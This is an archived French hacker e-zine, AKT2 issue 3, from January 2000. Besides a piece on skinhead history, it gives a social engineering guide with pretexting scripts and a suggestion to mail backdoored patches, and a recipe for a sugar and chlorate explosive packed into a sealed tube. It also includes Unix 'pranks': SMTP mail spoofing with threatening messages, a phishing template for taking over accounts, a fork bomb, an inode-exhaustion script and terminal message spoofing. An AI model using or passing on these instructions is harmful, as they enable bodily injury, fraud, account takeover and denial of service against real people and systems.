Copy Link
Add to Bookmark
Report

AKT2 issue 3

eZine's profile picture
Published in 
AKT2
 · 11 Oct 2020

  

CoMpReHeNsIvE GuIdE T0 MoDeRnE ReBeLlIoN MeGa-ZiNe

"on ne juge pas quelqu'un sur sa race, sa couleur, son sexe, son age, son rang social mais par ses connaissances, ses intérèt et ce qu'il vaut vraiment".




Nø3 Janvier 2K
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


222222
AAAA KK KK TTTTTTTTTTTTT 22 22
AA AA KK KK TT 22
AA AA KK TT 22
AA AAAAAA AA KK TT 22
AA AA KK KK TT 22
AA AA KK KK TT 2222222222

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

InTr0: Militants, activistes, l'heure est à la rebellion, encore plus que jamais ... Apres un mois de decembre mouvementé (sacrée tempête) et riche en desillusion (pas la fin du monde).
@Ktivist se remet d'un moment d'inactivité et se remet au boulot ...
(enfin, façon de parler)...

Du nouveau: C'est desormais notre Skl national qui s'occupera de votre courier, car caramail ça devient plus possible! (c'est surveillé a mort et pas pratique). On hesite encore a vous donnez notre adresse POP3, mais si vous etes sage peut etre ;). Encore un details: Skl est devenu Straight-edge !


CoNtaCt:
mail: xsklx@cyberdude.com
ou RTEL bal Aktivist
www.multimania.fr/awk1
IRC: #@Ktivist (irc.undernet.org)

DISCLAIMER: On est responsable de nos actes est on est (presque) tous conscients. La censure on l'emmerde, comme ces enculés qui veulent nous gouverner, pour nous c'est la liberté ou la mort.
Les politiciens ont aime pas ça, aucun respect pour des types
qui dépensent 10 Millions de francs par ans pour frais de reception
et qui laisse mourir des gens de faim.

On enfrein consciemment la loi, quand elle nous restreint nos libertés:
On est pas pour autant des criminels...

On a notre conscience, on sait ce qui est bien ou mal, on va pas se laisser dicter notre conduite par une bande de faschistes.

-<ooo*ooo>-

Sommaire:

1-Les Skinheads... par Skl
2-L'art du social engineering... par NeurAlien
3-Premier pas en explosifs... par NeurAlien/Inlandsis/Skl
4-Plaisanter sous Unix.. par Skl/Noway team

-----------------------------------------------------------------------------
***********************
*******SKIN-HEAD*******
********par Skl********
***********************




Salut les gars.
Je sais, ma presentation est moche, mais c'est pour faire plus simple, j'ai pas trop le temps de faire une belle presentation, sorry...

Je vais vous parler des skinheads. Ca vous semble etrange? vous croyez tout savoir sur eux? FAUX! lisez la suite ...

Les skin-heads sont apparus en Angleterre, tout comme les punks, a la fin des années 70.
Par rapport aux punks, ils se distinguent de part leurs intérêts:
Ils aiment, la biere, le foot, la baston, le ska.
(C'est quand meme des gros bourrins à la base ... )
En fait, les hooligans c'est eux!
mais leur look et et leur aptitude à la baston ont tôt fait d'attirer les mouvements facho anglais.
Et l'ampleur du "repechage" a été tel, qu'il ne subsiste guere de skin "non facho". Le crane rasé, les docs marteens ont été rapidement affublé de la croix gamé...
le symbole skin-head:
(------)
| |
(----- -----)
| |
(------)

(je sais je dessine mal) n'a pourtant aucun rapport avec l'ideologie nazi.
C'est pourquoi un nombre faible de skin-head, proche des punks, a decidé de lutter contre le faschisme qui gangrenait leur mouvement.
Les sharps sont nées dans les années 80 pour "lutter" contre les skin-nazi.
Ils restent encore peux nombreux, mais ils ont le merite d'exister.
S'il sont peu nombreux c'est parceque peu de choses les distinguent des skin-facho !
(hormis les idées)

Donc, si vous voyez un crane rasé dans la rue, qui a l'air plutot calme, et qui ne porte pas de croix gamés, ne lui jeter pas de pierres !

XSklX

-----------------------------------------------------------------------------
><

:O :o :I :! :/ L'art du social engineering :O :o :I :! :/

><

par NeurAlien

Si utile contre les grosses entreprise "à la big brother", le social
engineering permet d'attaquer un des points les plus faible de la société:
le personnel.

Je vais vous enseigner ici les choses que j'ai connue d'une pratique
courante et de l'enseignement de The Dude, maitre en l'art du social
engineering à Hack-Tic en Hollande.

Tout d'abord, le concept. Le social engineering couremment abrevié SE
est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations
sur n'importe quoi.
Pour cela, il faut etre convaicant, réagir comme la vraie personne et surtout
utiliser beaucoup de psychologie.

Exemple de SE classique:
Employée de FT au service exterieur: "France telecom bonjour,"
Hacker: "Bonjour, Monsieur Levallois du CPE d'Orléans" [Toujours essayer de
placer le maximum
d'acronymes dans la
conversation]
H: "Nous avons besoin de la liste des préfixes de numéro vert internationaux
par pays car nous avons un problème avec un des carriers."

FT: "Pardon? Je ne comprends pas bien. "
H: "J'ai besoin de la liste des 0590 indiquant le pays selon le préfixe!"
FT: "Attendez monsieur, je cherche... <pause> alors, Pour sprint....."
[ Et voila, c'est gagné ! ]

LA REGLE ULTIME DE CET ART

Il y a une chose et une seule qui vous garantira une maitrise parfaite
des correspondants lors d'une séance de SE, c'est la PRATIQUE.
On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas,
on ne sera jamais un serrurier.

Donc lisez ce G-Phile avec toute l'attention que vos cellules grises
peuvent y mettre et lancez vous.

Quelques règles de base:
=======================
- preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que
vous voulez et preparant des reponses toutes prêtes pour certaines questions
bateaux. Mettez au point le scenario, votre nom, ce que vous voulez.
- Toujours garder l'initiative dans la conversation: c'est vous qui posez les
questions.
- Ne pas faire du social engineering si votre voix est celle d'un jeune garcon
de 13 ans.
- ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question
qui vous dérange.
- faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs
résultats si vous le faites tout le temps d'une cabine sans préparation.
- plus on a d'informations pointues sur la société, plus le SE est possible.
Il est des fois TRES fructueux de faire les poubelles de la société avant
d'essayer le SE sur ses employés.

Quelques scénarios qui marchent:
===============================
vous pouvez vous faire passer pour
. utilisateur/acheteur
. personne connue
. urgence/flic/docteur
. questionnaire/enquête
. pour la presse, ca marche tres souvent mais on ne recoit pas d'information
détaillée.
Il faut aussi jouer sur les sentiments de votre correspondant:
- la peur: en cas de probleme, faites comprendre que cela peut lui attirer des
ennuis: foudres du patron, (pour l'employé)
fisc sur le dos, (pour le petit patron d'une PME)
arrestation, (pour un individu)
coupure du téléphone,
coupure EDF...
- plaisir: collaboration contre cadeau ex: questionnaire avec un
&greedy cadeau au bout si les reponses semblent véritable en
expliquant que c'est parce beaucoup de monde ne répond pas
en toute honneteté.
On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et
necessitant une réponse immédiate.
Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont
interressant.
Etre à deux peut être utile car ainsi si il y a un probleme, vous dites:
"bon, je vous passe mon supérieur mais il ne va pas être satisfait"
appuyez sur une touche du téléphone et envoyez une petite musique directement
au telephone."
Ne pas dire que vous etes de la tele: cela ne fait pas reel!
Pour un questionnaire, il peut être interressant de noyer les questions
interressantes dans un flot de question ininterressantes.
Un bon plan pour un coup de fil est:
- depart lent ou on explique bien
- des que la personne cède, on accélère le rythme pour qu'elle reste dans
cet état d'esprit.
Un autre est d'envoyer des patchs constructeurs par la poste concernant des
failles de sécurité avec des backdoor dans les patchs.
On peut aussi essayer de simuler un appel de la sécurité et d'envoyer un login.
Il y a aussi la possibilité de se faire passer pour la femme d'un informaticien
qui lui a demandé de télécharger un fichier depuis son téléphone de voiture
pour qu'il puisse aller directement à un ses rendez vous apres etre passer chez
lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire
passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont
généralement prises pour des burnes en informatique.
Utilisez les idiots.

En cas de problème lors de la conversation:
==========================================
Si on vous demande "
Pourquoi voulez vous ceci..."
2 règles: - toujours répondre
- emphase sur le "
PARCE QUE" (psycho involved)
(réponse bateau : "
on en a besoin pour...." )
Montrer que si ils facilitent les choses vous rendrez les choses plus faciles
pour eux aussi.
Si votre correspondant refuse de vous répondre, demandez leur superviseur
ou supérieur.

Les bonnes cibles:
=================
Le SE dépend énormément de votre adaptation à la personne qui est à
l'autre bout du fil. Vous devez toujours être en position de supériorité.
Pour cela, il faut déja attaquer des personnes qui ont l'habitude de recevoir
des ordres.

Ainsi, il est préférable de ne pas parler à l'administrateur mais
plutot à son assistant.

Bibliographie:
=============
Pr. Zuin "
The first 4/5 minutes"
Dale Carnegie "
Hoz to win friends and influence people"
Baladin Press "
The private handbook"


-----------------------------------------------------------------------------

premiers pas ...
§§§§ E X P L O S I F S §§§§



[ Petite précision sur les explosifs:
Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux.
Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE
QUOI ! On ne maitrise jamais totalement ce genre de produit (même les
artificiers professionels).
Un explosif amateur a un probleme: il n'est presque jamais stable, par contre
il est en général aussi fort que les explosifs professionels. Donc, il faut que
vous sachiez que chaque année il y a entre 10 et 100 gosse qui garderont a vie
des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter
des gants car sinon c'est vraiment pas beau!).
DECONNEZ PAS, faites vos mélanges en petite quantité et n'oubliez pas:
ce genre de mélange peut être MORTEL ! ++NeurAlien.]
-----------

L'explosif ? tient tient...


Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les paquet de petards, vous n' avez vous jamais lu 'Ne contient ni chlorate, ni perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les ingredients...

Premiere preparation, quelques grammes, moitier sucre, moitier chlorate. J'allume. Stupefaction, ca brulait tres vivement, une flamme jaune extremement lumineuse, pendant quelques secondes, en meme temps ca degageait une fumee blanche tres epaisse avec une odeur de caramel. (la decomposition spectrale est en fait celle du sodium, 2 raies jaunes). Le melange a l'etat brute ne fait que bruler a l'air libre. On dit que le compose fuse.

Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube. J'avais confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de l'autre. J' y mettais dedans les celebres Mammouths. Du cote ouvert on pouvait placer un projectile qui entrait dans le tube. Lorsque le petard claquait le projectile ( ecrou + boulon qui bouchait bien l'entree ) etait expulse avec une force suffisante pour percer une plaque de fer de 1/2 mm d'epaisseur.
Bien sur il me fallut peu de temps pour remplacer les Mammouths par le melange.
J'avais tasse au fond du tube une epaisseur de peut etre 5mm. Un trou dans le fond du tube laissait passer une meche de petard, ce qui declancherais l'explosion J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu' avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si peu de poudre...

Afin de perfectionner l'explosif, je fit quelques recherches. Meme le prof de physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs.

En voici les resultats:

Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et 1/3 de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui reste apres que l'on est fait fuser le melange:

Reste du rose coulant -> un peu trop de chlorate.
Reste noir bousoufle -> trop de sucre. Ce melange augemente
ces performances lorsqu'il est humide au toucher. Il ne doit surtout pas etre coulant. Il ne craint donc absolument pas l'humidite, au contraire. Le fin du fin c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro contiennent de l'huile de vaseline, mais cette operation est delicate a realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait tres important. Apres l'avoir tasse, ca doit etre un bloque dur.

Pour le faire, n'utilisez pas d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant meme d'avoir dit 'ouf..'

Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le melange est tellement instable, qu'il n'y a pas besoin de flamme pour que ca demarre. Ceci explique aussi pourquoi il est sensible aux chocs (le choc provoque un petit echauffement en un point, meme tres faible), donc attention !!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou peter) tout seul. On utilise au fur et a mesure qu'on fabrique.

Une solution pour en garder consiste a humudifier le melange, et le stocker dans un congelateur a -18 deg. Mais mieux vaut l'eviter si on peut.

Apres la parfaite maitrise, je confectionnais un gros petard, avec 100 grammes de melange tasse dans un bout de cadre de velo decoupe et ferme au bout a la presse prealablement percer pour laisser passer une meche. -----> Ne percer pas apres avoir mis le melange et fo prendre la precaution de mettre du papier mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas le melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une plaque en beton des telecoms. J'allume la meche et je me retire mine de rien. De toute ma vie je n'ai jamais entendu une telle detonnation ! Ce n'est pas comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit j'ai pense que les plaques de beton de largement plus de 100kg et de 10cm d'epaisseur etait integralement pulverisees. C'est une detonnation qui ne fait pas mal aux oreilles. C'est un bruit tres puissant, tres sourd et tres grave,

un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation une grande fumee blanche se dissipa. Imaginer la tete des gens, on pense a un attentat. D'ailleurs dans la minute qui suivit la detonnation personne n'a ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres.

C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue Vraiment si on s'imaginait la force que ca peut avoir, personne n'aurait le courage d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on a eu beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir.

A bon entendeur, salut !...
By Inlandsis.

-----------------------------------------------------------------------------
---===***###> Plaisanter sous Unix <###***===---
o/~ Skl/Noway team o/~


Normalement cet article aurait du se trouver dans Aktivist mag, mais par manque de place, il n'as pas pu se trouver dans le dernier numero, et il a été uploader trop vite. Donc il "
atterit" dans Akt2, mais c'est pas plus mal!
enjoy !

xSklx

Vous vous etes toujours demandé comment jouer des farces sous Unix,
comment foutres les boules a vos potes, a votre administrateur, jouer au con
avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre
petit ++N-Phile. Amusez vous bien !

[ nota : tout ce qui est tapé au clavier est précédé de "
>>>" ]

> Mailer sous un autre nom:
========================
Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix
est transporte de machine en machine par "
sendmail" qui écoute les messages des
autres mailers ou de ses clients sur le port TCP numéro 25.

DaubeNet {101} grep smtp /etc/services
smtp 25/tcp mail

Donc il suffit de se connecter la bas et de respecter le protocole SMTP
(Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
mail qui pourrait venir de n'importe ou.

----------------------
DaubeNet {102} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
220 ESMTP spoken here
>>>help
214-Commands:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB
214-For more info use "
HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail@CS.Berkeley.EDU.
214-For local information send email to Postmaster at your site.
214 End of HELP info
>>>help helo
214-HELO <hostname>
214- Introduce yourself.
214 End of HELP info
>>>help mail
214-MAIL FROM: <sender>
214- Specifies the sender.
214 End of HELP info
>>>help rcpt
214-RCPT TO: <recipient>
214- Specifies the recipient. Can be used any number of times.
214 End of HELP info
>>>help data
214-DATA
214- Following text is collected as the message.
214- End with a single dot.
214 End of HELP info
>>>help quit
214-QUIT
214- Exit sendmail (SMTP).
214 End of HELP info
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
un mail. C'est très facile mais il y a une bidouille qu'il faut connaitre et
qui vous trahi si vous ne la connaissez pas.

----------------------
DaubeNet {103} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
220 ESMTP spoken here
>>>helo ducon.fbi.com
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
>>>mail from: root@ducon.fbi.com
250 root@ducon.fbi.com... Sender ok
>>>rcpt to: fred
250 fred... Recipient ok
>>>data
354 Enter mail, end with "
." on a line by itself
>>>
>>>Please, would you stop playing with my Unix system otherwise i'll
>>>send a wet operation commando to your university.
>>>
>>>Nigel X.
>>>System Administrator at FBI Inc.
>>>root@fbi.com
>>>.
250 DAA00299 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Haha, ca y est, on a envoyé notre petite bidouille et le mec va avoir les
jetons de sa vie:

----------------------
DaubeNet {104} >>> mail
Mail version 5.5 6/1/90. Type ? for help.
"
/var/mail/fred": 1 message 1 new
>N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508
& >>>1
Message 1:
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
From: root@ducon.fbi.com
Apparently-To: fred [ * ]

Please, would you stop playing with my Unix system otherwise i'll
send a wet operation commando to your university.

Nigel X.
System Administrator at FBI Inc.
root@fbi.com

& >>>d
& >>>q
----------------------

Arghh... Vous avez vu comme moi la ligne ou j'ai mis une astérisque entre
crochets : C'est marqué: "
Apparently-To: " arghhh... Ca fait vraiment pas
serieux n'est ce pas?
C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
Et en parlant de bidouille, la voici...

----------------------
DaubeNet {105} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
220 ESMTP spoken here
>>>helo
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
>>>mail from: root@fbi.com
250 root@fbi.com... Sender ok
>>>rcpt to: fred
250 fred... Recipient ok
>>>data
354 Enter mail, end with "
." on a line by itself
>>>To: fred@univ-anon.fr [ * ]
>>>
>>>Good afternoon,
>>>
>>> Could you please stop playing with my unix system otherwise i'll
>>>be forced to send one of our wet operations' commando to execute you.
>>>
>>>Nigel X, System Administrator at Fbi Inc.
>>>.
250 DAA00307 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Vous regarderez attentivement la premiere ligne tapée après le DATA.
C'est un "
To: " suivi de l'adresse a qui on envoie...
Et voila le résultat:

----------------------
DaubeNet {106} >>> mail
Mail version 5.5 6/1/90. Type ? for help.
"
/var/mail/fred": 1 message 1 new
>N 1 root@fbi.com Thu Sep 15 03:57 14/509
& >>>1
Message 1:
From root@fbi.com Thu Sep 15 03:57:41 1994
From: root@fbi.com
To: fred@univ-anon.fr

Good afternoon,

Could you please stop playing with my unix system otherwise i'll
be forced to send one of our wet operations' commando to execute you.

Nigel X, System Administrator at Fbi Inc.

& >>>d
& >>>q
DaubeNet {107} exit
----------------------

C'est beau non la technique... ;)

Grace à cela vous pouvez commencer à lancer la terreur sur votre réseau.

Hacking Psychology:
==================
Les utilisateurs sont par définition très soumis (et c'est pour cela
que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
qui peut faire du faux mail...

Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
completement flooder toute la boite aux lettre de votre/vos victime(s).

Mais il y a plus interressant.
Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
disant:
-----
* This is and automated mailing : don't reply *

We have found that your password is insecure. You should change this
otherwise your account will be disabled.

Please use the password "
ItG-4v3" instead.

Thank you.
Security Daemon.
-----
Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
comptes. Une fois, j'ai réussi même à faire changer le mot de passe de
*l'admin* !!!!! Quel con, il obéit à des packages de sécurité qu'il n'a même
pas installé. AHahaha !

Foutre un systeme sur les genoux:
================================
Pour cela il y a des petits trucs tout con à faire si vous n'avez pas
d'accounting:
créez un petit script "
toto" de ce type:
#!/bin/sh
mkdir ./-fuck
cp ./toto ./-fuck/toto
cd ./-fuck
./toto

Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
par manque d'inode.

On peut aussi faire dans le meme genre un fichier "
foo":
#!/bin/csh
./foo &
./foo &
./foo &

hehe, effet tout aussi garanti...

On peut même mixer les deux !

Les messages fantomes:
=====================
Vous savez, quand vous faites un write la personne à qui il est déstiné
recoit:
Message from <luser> at/...
Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
non??
Eh bien c'est possible:
Il faut savoir comment ca marche. Chaque utilisateur loggé a au moins un
terminal. Ce terminal est représenté dans le système Unix comme un nom de
périphérique du type: /dev/ttyXX ou XX est généralement un nombre ou une lettre
et un nombre.
Bref, c'est la dessus qu'écrit la commande write.
Le "
msg on" ou "msg off" que l'on tape modifie simplement la protection en
écriture sur ce périphérique. Sur les anciens système, l'appel système
vhangup() n'éxistait pas et on pouvait donc se connecter, regarder les
terminaux disponibles (nons attribués à des users donc en lecture et ecriture
pour tout le monde) et faire un cat dessus comme ceci:
$ cat >/dev/tty02
ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
par ce terminal.
Ensuite, préparer a coté le :

Message from root at...
Veuillez changer immédiatement votre mot de passe en: "
TuY5;tK"
Merci. Votre administrateur système.
<EOT>

Fun isn't it?

S'amuser avec les émulateurs de terminaux:
=========================================
Vous savez que par exemple zmodem envoie une chaine de caractère qui
lance automatiquement Zmodem en reception du cote de l'émulateur de terminaux.
C'est très interressant car on peut faire appeler intempestivement Zmodem dans
l'émulateur si telle ou telle personne en message on utilise un émulateur de
terminaux.

Il suffit d'enregistrer la séquence envoyée par Zmodem pour déclancher l'appel
de Zmodem et hop, bienvenue en enfer !

Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
et son ancetre qui ne le fait pas mais est sympa: flash.c.

-----------------------------------------------------------------------------

That's all Folks!



Skl : make friends...
Thanx to: Seldon, Phoenix, Fangor.
[now Straight Edge]

RAmdAc: Non au net commercial !
[cyberpunk]

Mook : 1000 excuses au pote à Skl dont j'ai hacké le site!
(NdSkl: et pis koi encore !!!)
[cyberpunk]

Turican : <higher than you think> BOOM BOOM BOOM
[Raver]

Nico : Melanie je t'aime !!!
[HxC]

Taz : Fab, rend moi mes DBZ !!
[Otaku]

Cris : GO VEGAN
[HxC Vegan S.E.]



GrEetZ: NeurAlien (too old to die??)
RemX (attention aux emanations d'un certain François! Skl)
X83X crew (il en reste?) www.x83x.ch
Vincent, Christian et tous les Sk8tR de VLG.
Dizzy
Merael
YodAA
ThXXX
XmarX
XcalX
Bruno
Elian
Krisha
... others: S O R R Y !!
[EOF]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT